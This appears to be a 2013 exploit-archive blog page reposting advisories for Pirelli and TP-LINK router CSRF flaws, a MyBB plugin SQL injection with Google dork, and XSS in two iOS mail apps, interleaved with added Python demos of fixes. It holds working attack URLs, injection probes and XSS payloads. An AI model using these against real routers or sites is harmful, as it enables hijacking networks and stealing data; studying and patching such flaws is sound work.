Showing posts with label webapps.

Monday, November 25, 2013

[webapps] - Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability



# Exploit Title: Pirelli Discus DRG A125g remote change wifi password vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) alpha
# (")(")

# Exploit:
http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip

# Info: the parameter wlWpaPsk=PASSWORDHERE is where we enter the password we want to set on the victim's WiFi. The change is triggered by a plain GET request, so if the victim clicks the URL, their modem/router reboots automatically with the new password provided by the attacker.



[webapps] - MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability


############################
# Mybb Ajaxfs Plugin Sql Injection vulnerability
############################
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected] - [email protected]
# Home : http://iedb.ir - http://iedb.ir/acc
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
# Security Risk : High
# Tested on : Linux
# Dork : inurl:ajaxfs.php
#################################

Vulnerable code in ajaxfs.php (both GET parameters are concatenated into the query without escaping or casting, so a single quote breaks out of the string literal):

1) if(isset($_GET['tooltip'])) {
       $pid = $_GET['tooltip'];                       // untrusted, unescaped
       $query_post = $db->query("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");

2) if(isset($_GET['usertooltip'])) {
       $uid = $_GET['usertooltip'];                   // untrusted, unescaped
       $query_user = $db->query("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");

Probe:

http://localhost/Upload/ajaxfs.php?usertooltip=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Google DORK : inurl:ajaxfs.php

# Exploit :
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
#################################
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
#################################
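Added example, not code from the IeDb advisory or the MyBB Ajaxfs plugin: the ajaxfs.php lookup re-created in Python over an in-memory SQLite table, beside the parameterised form, so the lone-quote probe and a tautology can be run offline. The table prefix and rows are constructed for the demo; in PHP/MyBB the same fix is intval($_GET['usertooltip']) (or $db->escape_string()) and a prepared statement rather than string concatenation.

```python
"""Added example, not code from the IeDb advisory or the MyBB Ajaxfs plugin:
the ajaxfs.php lookup re-created over SQLite so the injection can be run offline.
Table prefix and rows are constructed for the demo."""
import sqlite3

TABLE_PREFIX = "mybb_"   # stands in for MyBB's TABLE_PREFIX constant (assumed value)


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the users table ajaxfs.php reads."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {TABLE_PREFIX}users (uid INTEGER, username TEXT)")
    con.executemany(f"INSERT INTO {TABLE_PREFIX}users VALUES (?, ?)",
                    [(1, "admin"), (2, "alice"), (3, "bob")])
    return con


def lookup_user_vulnerable(con: sqlite3.Connection, uid: str) -> list:
    """Mirrors ajaxfs.php: $_GET['usertooltip'] is pasted straight into the SQL text."""
    sql = f"SELECT uid, username FROM {TABLE_PREFIX}users WHERE uid='{uid}'"
    return con.execute(sql).fetchall()


def lookup_user_fixed(con: sqlite3.Connection, uid: str) -> list:
    """Hardened form: the id is cast to int and travels as a bound parameter,
    so quotes, OR clauses and comment markers never reach the SQL parser."""
    try:
        uid_int = int(uid)
    except ValueError:
        return []
    sql = f"SELECT uid, username FROM {TABLE_PREFIX}users WHERE uid=?"
    return con.execute(sql, (uid_int,)).fetchall()


def demo() -> dict:
    """Replays the advisory's probe and a tautology against both lookups."""
    con = make_db()
    out = {}
    # The advisory's probe: usertooltip=1' leaves an unterminated string literal.
    # MySQL answers with error 1064; SQLite raises OperationalError for the same reason.
    try:
        lookup_user_vulnerable(con, "1'")
        out["probe"] = "no error"
    except sqlite3.OperationalError as exc:
        out["probe"] = f"syntax error: {exc}"
    # A tautology turns a single-row lookup into a dump of the whole table.
    out["vuln_rows"] = lookup_user_vulnerable(con, "1' OR '1'='1")
    # The same input against the fixed lookup is rejected outright.
    out["fixed_rows"] = lookup_user_fixed(con, "1' OR '1'='1")
    out["fixed_ok"] = lookup_user_fixed(con, "2")
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The int() cast is what makes the fixed lookup refuse the tautology entirely; where the id really must be a string, the bound parameter alone is still sufficient, because the driver sends the value separately from the statement text.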


[webapps] - WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability



# -----------------------------------------------------------#
# WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability
#
# This PoC code should do two main things:
# 1. Cross Site Request Forgery (for more information, just google it).
# 2. Change to a new password without knowing the current password.
#
# The vulnerability works like this: if the "PA=" parameter, which carries the current password,
# is removed from the request, the application ignores its absence and changes the password
# without the old / current password ever being entered.
#
# Bug discovered by Pr0T3cT10n AKA Yakir Wizman,
# Date 17/08/2012
# Vendor site - http://www.level1.com/
# ISRAEL
# -----------------------------------------------------------
# Author will not be responsible for any damage.
# -----------------------------------------------------------
# PoC EXPLOIT
# -----------------------------------------------------------

# -----------------------------------------------------------


[webapps] - Google Gmail IOS Mobile Application - Persistent / Stored XSS



Title:
======
Gmail IOS Application Attachment Cross Site Scripting

Date:
=====
2013-11-11

Introduction:
=============
Gmail is a free, advertising-supported email service provided by Google. Users may access Gmail as secure webmail, as well as via POP3 or IMAP4 protocols. Gmail initially started as an invitation-only beta release on April 1, 2004 and it became available to the general public on February 7, 2007, though still in beta status at that time. The service was upgraded from beta status on July 7, 2009, along with the rest of the Google Apps suite. With an initial storage capacity offer of 1 GB per user, Gmail significantly increased the webmail standard for free storage from the 2 to 4 MB its competitors such as Hotmail offered at that time. Individual Gmail messages, including attachments, may be up to 25 MB, which is larger than many other mail services support. Gmail has a search-oriented interface and a "conversation view" similar to an Internet forum. Gmail is noted by web developers for its pioneering use of Ajax. Gmail runs on Google GFE/2.0 on Linux. As of June 2012, it is the most widely used web-based email provider with over 425 million active users worldwide.

Report-Timeline:
================
2013-11-11: Researcher Notification & Coordination (Ali Raza Khawaja)

Status:
========
Unpublished

Affected Products:
==================
Google Gmail Mobile IOS Application

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A persistent / stored XSS vulnerability is detected in the official Google Gmail IOS Mobile Application. The vulnerability allows remote attackers to inject their own malicious script code into a vulnerable module on the application side (persistent) via the mail attachment feature. All iPad/iPhone users are affected directly by this vulnerability.

During testing it was discovered that .html files can be attached to outgoing emails. Viewing these attachments directly on an iPhone/iPad device results in successful execution of the malicious script code: the application renders the attachment as active HTML instead of treating it as inert content. Attackers can use this to exploit Gmail IOS users by injecting malicious iframes and redirecting users to external domains.

Vulnerable Module(s):
[+] Compose Mail > Attach Files

Proof of Concept:
=================
1) Open any text editor, paste the payload and save the file as payload.html
2) Compose an email with any mail service provider and attach the HTML file via the attachment feature.
3) Open the received email in your Gmail IOS application.
4) Click on the attachment file.
5) The iframe can be seen in the Gmail IOS application, proving the existence of this vulnerability.

Payload:
========
'%3d'>">/927

Credits:
========
Ali Raza Khawaja - Security Consultant arkhawaja@outlook.com



[webapps] - TPLINK WR740N/WR740ND - Multiple CSRF Vulnerabilities



# Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities
# Date: 11/24/2013
# Author: SaMaN( @samanL33T )
# Vendor Homepage: http://tplink.com
# Category: Hardware/Wireless Router
# Firmware Version: 3.16.6 Build 130529 Rel.47286n and below
# Tested on: WR740N/WR740ND (may be possible on other models)
---------------------------------------------------

Technical Details
~~~~~~~~~~~~~~~~~~
The TPLINK wireless router WR740N has a Cross Site Request Forgery vulnerability in its web console. An attacker can change the wireless password, reboot the router or change settings simply by making the user visit a CSRF link.
The application uses an "HTTP-REFERER" check to detect CSRF attacks, but it can easily be bypassed by adding a "Referer" parameter with its value set to the target's IP to the GET request.

Exploit Code
~~~~~~~~~~~~~

Change WPA/WPA2 password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# For changing the security to Open WEP, simply change the "secType" value to 1.

Reboot Router by CSRF
~~~~~~~~~~~~~~~~~~~~~

Factory Reset the Router
~~~~~~~~~~~~~~~~~~~~~~~~

--SaMaN
twitter : @samanL33T


[webapps] - Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability



# Exploit Title: Pirelli Discus DRG A125g remote change SSID value vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) alpha
# (")(")

# Exploit:
http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof

# Info: the parameter "wlSsid" is where the attacker enters the new SSID. As with the WiFi password change above, the change is triggered by a plain GET request, so if the victim clicks the URL, their modem/router reboots automatically with the new SSID provided by the attacker.
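The four router posts on this page (both Pirelli DRG A125g entries, the WBR-3406 password change and the TP-LINK WR740N referer bypass) share one root cause: a configuration endpoint that applies whatever a single browser request carries. What follows is an added example, not firmware code from Pirelli, the WBR-3406 vendor or TP-LINK: a small Python model of a router web console with a handler that behaves the way the advisories describe, next to a hardened handler that refuses each of those requests. The request class, the session store, the /password and /wireless endpoint names and the exact form of the weak checks (in particular how the TP-LINK referer check is modelled) are assumptions made for the demo; only the Pirelli paths and parameter names, the PA/PW names and secType come from the page.

```python
"""Added example, not firmware from Pirelli, the WBR-3406 vendor or TP-LINK:
a model of a router web console with the weaknesses the advisories describe
beside a handler that closes them. Request shape, session store, the /password
and /wireless endpoint names and the form of the weak checks are assumptions;
the Pirelli paths and parameter names are the ones on the page."""
from dataclasses import dataclass, field
import hmac
from urllib.parse import urlsplit

ROUTER_HOST = "10.0.0.2"   # LAN address used in the Pirelli advisories


@dataclass
class Request:
    method: str
    path: str
    query: dict = field(default_factory=dict)    # URL parameters
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)     # POST body fields


def weak_handle(req: Request):
    """Behaves the way the advisories describe (an assumed model, not vendor code):
    GET or POST alike, no session, no token, values taken from wherever they appear."""
    p = {**req.query, **req.form}
    if req.path in ("/wladv.wl", "/wlbasic.wl"):
        # Pirelli: the new key or SSID is applied as soon as the parameter is present.
        key = "wlWpaPsk" if req.path == "/wladv.wl" else "wlSsid"
        if key in p:
            return 200, f"{key} set to {p[key]!r}, rebooting"
    elif req.path == "/password":
        # WBR-3406: the current password (PA) is never required to set a new one (PW).
        if "PW" in p:
            return 200, "admin password changed, PA not checked"
    elif req.path == "/wireless":
        # TP-LINK: the Referer check also accepts a *parameter* named Referer, so
        # Referer=<router ip> in the query string satisfies it (assumed model).
        seen = req.headers.get("Referer", "") + " " + p.get("Referer", "")
        if ROUTER_HOST not in seen:
            return 403, "referer check failed"
        return 200, f"security type set to {p.get('secType')}"
    return 404, "unknown endpoint or missing parameter"


def hardened_handle(req: Request, sessions: dict):
    """A state change needs all of: POST, a logged-in session, an Origin or Referer
    *header* naming the router, a CSRF token bound to the session and, for a
    password change, the current password. Each check fails closed."""
    if req.method != "POST":
        return 405, "state changes require POST"
    sess = sessions.get(req.cookies.get("sid", ""))
    if sess is None:
        return 401, "login required"
    origin = req.headers.get("Origin") or req.headers.get("Referer") or ""
    if urlsplit(origin).hostname != ROUTER_HOST:
        return 403, "cross-origin request refused"
    if not hmac.compare_digest(req.form.get("csrf", ""), sess["csrf"]):
        return 403, "missing or wrong CSRF token"
    if req.path == "/password":
        if not hmac.compare_digest(req.form.get("PA", ""), sess["admin_pw"]):
            return 403, "current password required"
        if not req.form.get("PW"):
            return 400, "new password missing"
        sess["admin_pw"] = req.form["PW"]
        return 200, "admin password changed"
    if req.path in ("/wladv.wl", "/wlbasic.wl", "/wireless"):
        return 200, f"{req.path} settings updated"
    return 404, "unknown endpoint"


def demo() -> dict:
    """Replays the advisories' request shapes against both handlers. Session id,
    token and admin password are constructed; the victim's browser attaches the
    cookie automatically, which is what makes the CSRF variants work."""
    sessions = {"s3ss10n": {"csrf": "tok-abc", "admin_pw": "old-pass"}}
    jar = {"sid": "s3ss10n"}
    evil = {"Referer": "http://evil.example/", "Origin": "http://evil.example"}
    own = {"Origin": f"http://{ROUTER_HOST}"}
    reqs = {
        "pirelli": Request("GET", "/wladv.wl", {"wlSsidIdx": "0", "wlWpaPsk": "PASSWORDHERE"}, evil, jar),
        "wbr_no_pa": Request("GET", "/password", {"PW": "attacker"}, evil, jar),
        "tplink_header_only": Request("GET", "/wireless", {"secType": "1"}, evil, jar),
        "tplink_param": Request("GET", "/wireless", {"secType": "1", "Referer": ROUTER_HOST}, evil, jar),
        "forged_post": Request("POST", "/wlbasic.wl", {}, evil, jar, {"wlSsid": "bysmagof"}),
        "post_no_pa": Request("POST", "/password", {}, own, jar, {"csrf": "tok-abc", "PW": "x"}),
        "legit": Request("POST", "/password", {}, own, jar, {"csrf": "tok-abc", "PA": "old-pass", "PW": "new"}),
    }
    # (weak status, hardened status) per scenario
    return {name: (weak_handle(r)[0], hardened_handle(r, sessions)[0]) for name, r in reqs.items()}


if __name__ == "__main__":
    for name, (weak, hard) in demo().items():
        print(f"{name:20s} weak={weak} hardened={hard}")
```

The header-only TP-LINK case shows why a Referer check looks adequate in a quick test: a plain cross-site GET is refused. It fails only because the value is read from the wrong place, and the hardened handler does not rely on it at all; the session-bound token is the control, with the Origin/Referer header and the POST-only rule as defence in depth.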



Thursday, September 26, 2013

[webapps] - Good for Enterprise 2.2.2.1611 - XSS Vulnerability

The vulnerable versions are v2.2.2.1611 and earlier

Proof of Concept:
HTML email including the following payload will execute JavaScript statements when the victim opens the email using the vulnerable version.

Payload: < script >alert('XSS Here')< / script>

Remediation:
I worked with the Good people to close the issue, I provided some guidance and feedback and agreed with them to not disclose it until they fixed it.
The new release is now available: update the "Good for Enterprise" iOS application to 2.2.4.1659 or newer

References:
https://www.roblest.com/#research:CVE-2013-5118

Can the community please provide feedback and comments in order to ensure the fix is working well
Many thanks
Mario
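Both mail-client reports on this page (the Gmail IOS attachment issue above and this Good for Enterprise HTML email issue) come down to the same thing: untrusted HTML rendered with script enabled in the application's own context. The following is an added example, not Google's or Good's code: a Python scanner that flags the constructs an HTML body or attachment can use to run script or pull cross-origin content, plus the response headers a web-based attachment viewer would attach so that an HTML file that is rendered anyway lands in a sandboxed origin with no script. The sample HTML strings are constructed in the shape of the two reports, not the original payloads.

```python
"""Added example, not Google's or Good's code: flag active content in untrusted
mail HTML and pick the headers a web-based attachment viewer should send.
All sample HTML below is constructed."""
from html.parser import HTMLParser

# Elements that execute, embed or redirect, and attributes that take URLs.
ACTIVE_TAGS = {"script", "iframe", "frame", "object", "embed", "form", "meta", "base", "link"}
URL_ATTRS = {"src", "href", "action", "formaction", "data"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


class ActiveContentFinder(HTMLParser):
    """Collects every construct that could run script or load cross-origin content.
    HTMLParser lowercases tag and attribute names, so <IMG ONERROR=...> is caught."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}>")
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):                       # onerror=, onload=, ...
                self.findings.append(f"{tag}@{name}")
            elif name in URL_ATTRS and value.startswith(SCRIPT_SCHEMES):
                self.findings.append(f"{tag}@{name}={value[:24]}")

    handle_startendtag = handle_starttag                     # <img ... /> form


def scan_html(html: str) -> list:
    """Returns the list of active constructs found; an empty list means inert markup."""
    finder = ActiveContentFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def attachment_headers(filename: str, is_html: bool) -> dict:
    """Headers for serving a mail attachment from a web-based viewer: forced
    download, no MIME sniffing, and for HTML a sandbox CSP plus a text/plain type,
    so a file that does get rendered runs in an opaque origin with no script."""
    safe_name = filename.replace('"', "").replace("\r", "").replace("\n", "")
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
    }
    if is_html:
        headers["Content-Type"] = "text/plain; charset=utf-8"
        headers["Content-Security-Policy"] = "sandbox; default-src 'none'"
    return headers


# Constructed samples in the shape of the two reports (not the original payloads).
GMAIL_STYLE = '<html><body><iframe src="http://attacker.example/"></iframe></body></html>'
GOOD_STYLE = "<p>Hi</p><script>alert('XSS Here')</script>"
TRICKY = '<IMG SRC="x" ONERROR="alert(1)"><a href=" JavaScript:alert(2)">x</a>'
BENIGN = '<h1>Invoice</h1><p>Total: <b>42</b></p><a href="https://example.com/">site</a>'

if __name__ == "__main__":
    for label, sample in [("gmail", GMAIL_STYLE), ("good", GOOD_STYLE),
                          ("tricky", TRICKY), ("benign", BENIGN)]:
        print(f"{label:7s} {scan_html(sample)}")
    print(attachment_headers("payload.html", is_html=True))
```

A scanner like this belongs on the receiving side as a gate, not as the only control: a native client such as the two iOS apps here should render attachments and HTML bodies in a web view with JavaScript disabled and remote loads blocked, and the headers are for the case where the attachment is fetched from a web front end.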
